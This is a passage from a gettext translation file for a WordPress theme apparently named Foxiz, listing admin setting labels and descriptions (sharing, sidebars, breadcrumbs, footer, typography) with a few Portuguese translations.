msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:68 msgid "" "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of " "the content." msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in " "case you are using 3rd party markup plugin." msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to " "use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand " "signals. Disable this option if you want to use 3rd party plugin." msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema " "markup for this post if you use a 3rd plugin to create another post type for " "example Recipe, Videos." msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the " "single post." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "archive pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author " "pages." msgstr "" #: backend/panels/blog-pages.php:809 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the blog " "page." msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "category pages." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search " "pages." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be " "overridden by the setting in individual post/page." msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply " "to whole the website." msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below " "of the post content." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/panels/single-post.php:1213 msgid "" "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1474 msgid "" "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want " "to use 3rd party plugin." msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/design.php:186 msgid "" "Enable or disable the human time format (\"ago\") for the data post entry " "meta." msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:393 msgid "" "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/bookmark.php:45 msgid "" "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:1297 msgid "" "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the " "single entry meta info." msgstr "" #: backend/panels/single-post.php:1220 msgid "" "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/single-metaboxes.php:484 msgid "" "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for " "brand SERPs and can help your website name to appear in search results." msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in " "the single post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the " "\"More Menu Triggered\" option." msgstr "" #: backend/panels/header.php:286 msgid "" "Ensure this section set to Light Text if you select a dark sub-menu " "background." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for " "the default mode." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry Widgets" msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: " "tagslug1,tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "Encontrar mais" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 #: backend/panels/amp.php:452 backend/panels/amp.php:513 #: backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid "Float Right" msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "Seguir" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "Nos siga nas redes sociais" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "Seguir:" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 #: backend/panels/general.php:10 backend/panels/header.php:31 #: backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: 